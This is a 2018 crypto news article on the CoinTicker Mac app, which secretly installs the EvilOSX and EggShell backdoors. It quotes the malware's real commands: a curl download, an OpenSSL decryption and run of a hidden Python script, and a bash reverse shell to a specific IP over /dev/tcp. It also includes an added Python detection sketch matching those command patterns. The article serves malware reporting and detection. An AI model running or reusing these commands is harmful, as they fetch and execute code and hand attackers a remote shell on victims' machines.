CoinTicker Crypto Tracking App Installs Backdoors On Mac Computers

Posted on October 31, 2018, 1:02 pm by Prasanna

CoinTicker, a Mac menu-bar app that presents the latest prices of many cryptocurrencies, is installing two backdoors on Mac computers. According to a Malwarebytes blog post, a forum contributor, 1vladimir, observed that an application called CoinTicker had been installing backdoors onto computer systems after download.

The CoinTicker App Behaviors

The blog explains that the CoinTicker app at first seems to be a legitimate application that could be useful to people who have invested in cryptocurrencies. Once downloaded, the app places an icon in the menu bar that shows the current price of Bitcoin. The app's options let the user customize the display to show data about a wide range of cryptocurrencies, such as Bitcoin, Ethereum, and Monero.

This functionality appears legitimate, but in reality the app installs two backdoors. They avoid any request for root authentication because of the app's legitimate behavior. When a user launches the app, it downloads and installs parts of two different open-source backdoors: EvilOSX and EggShell. The app runs the following shell command to download a custom-compiled version of the EggShell server for macOS:

nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py

The first part of the command downloads an encrypted file from a GitHub page belonging to a user named "youarenick" and saves it to a hidden file called .info.enc in /private/tmp/ (on macOS, /tmp is a symbolic link to /private/tmp). It then uses OpenSSL to decrypt that file into a hidden Python file called .info.py. Finally, it runs the resulting Python script.

The .info.py script performs several tasks. First, it opens a reverse shell connection to a command-and-control server, using the following command:

nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1
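The two commands above leave recognizable traces in process command lines. The following detection sketch is an added example, not code from Malwarebytes or from the original article; the rule names, the helper functions and the benign sample lines are constructed for illustration, and it assumes command lines are available as plain strings from some process-execution log.

```python
import re

# A hidden (dot-prefixed) file directly under /tmp or /private/tmp.
HIDDEN_TMP = r"(?:/private)?/tmp/\.[\w.-]+"

# One rule per stage of the chain. Excluding ; | & keeps the option
# matching inside a single command of a chained command line.
RULES = {
    "curl_insecure_to_hidden_tmp": re.compile(
        r"\bcurl\b(?=[^;|&]*\s-k\b)[^;|&]*\s-o\s+" + HIDDEN_TMP),
    "openssl_decrypt_to_hidden_tmp": re.compile(
        r"\bopenssl\s+enc\b(?=[^;|&]*\s-d\b)[^;|&]*\s-out\s+" + HIDDEN_TMP),
    "interpreter_runs_hidden_tmp": re.compile(
        r"\b(?:python[\d.]*|bash|sh|perl|ruby)\s+" + HIDDEN_TMP),
    "shell_redirected_to_dev_tcp": re.compile(
        r"\b(?:ba)?sh\b[^;|]*[<>]&?\s*/dev/tcp/[\w.-]+/\d+"),
}

def detect(cmdline):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(cmdlines):
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    return {c: hits for c in cmdlines if (hits := detect(c))}

SAMPLES = [
    # The two commands quoted in the article.
    "nohup curl -k -L -o /tmp/.info.enc "
    "https://github.com/youarenick/newProject/raw/master/info.enc; "
    "openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py "
    "-k 111111qq; python /tmp/.info.py",
    "nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1",
    # Constructed benign lines that must not be flagged.
    "curl -L -o /Users/alice/Downloads/report.pdf https://example.com/report.pdf",
    "openssl enc -aes-256-cbc -d -in backup.enc -out backup.tar -k example",
    "python /tmp/build/setup.py install",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLES).items():
        print(", ".join(hits), "<-", cmd[:60])
```

The rules key on behavior (hidden files in the temporary directory, a shell wired to /dev/tcp) rather than on the specific URL or IP address, so they still apply if those values change.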

The blog adds that the attacker's purpose behind this app is not yet known. Because the malware is spread through a cryptocurrency app, however, it appears likely that it is meant to gain access to users' cryptocurrency wallets in order to steal coins.

This app was probably never legitimate, because it is distributed via a domain named coin-sticker.com. This domain was registered only a few months ago, on July 13.

About EvilOSX and EggShell

EvilOSX is malware published on GitHub that gives attackers a highly customizable attack tool that runs on both older and newer versions of macOS. The project can be downloaded by anyone. It is a remote access trojan, a program that can be used to spy on a macOS user by accessing things like the system's webcam, microphone, and screenshot service. It also enables attackers to download personal files without the victim's knowledge.

EggShell is post-exploitation malware written in Python. It provides its users with a command-line console with additional functionality. It also gives attackers the power and ease of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, privilege escalation, password retrieval, and much more.

The post concluded that the interesting thing about CoinTicker is that it requires only normal user permissions; root permissions are not required. There is often an undue over-emphasis on malware's need for root privileges, but this malware is a classic illustration that malware does not need such privileges to pose a high risk.

Just a few days ago, the McAfee Labs Threat Report for September 2018 found that malware that mines cryptocurrency using a PC's resources doubled in Q2 2018, with an 85% increase. McAfee's research also found an increase in malware attacks targeting mobile devices. A growing trend toward mobile adoption has been noticed across the sector, as both CoinMarketCap and Binance Info have released apps that let users access market data on mobile devices. The new Zcash (ZEC) 'Sapling' update will reduce the computational power needed for its encryption algorithm, zk-SNARKs, which will make transactions on mobile phones a reality.

The popularity and growing real-world importance of cryptocurrencies are also attracting cybercriminal attention. Crypto-mining malware, software created to illegally mine cryptocurrency, nearly doubled in the second quarter of the year, and perpetrators could be building malware specifically to target mobile devices.

©2021 CryptoTicker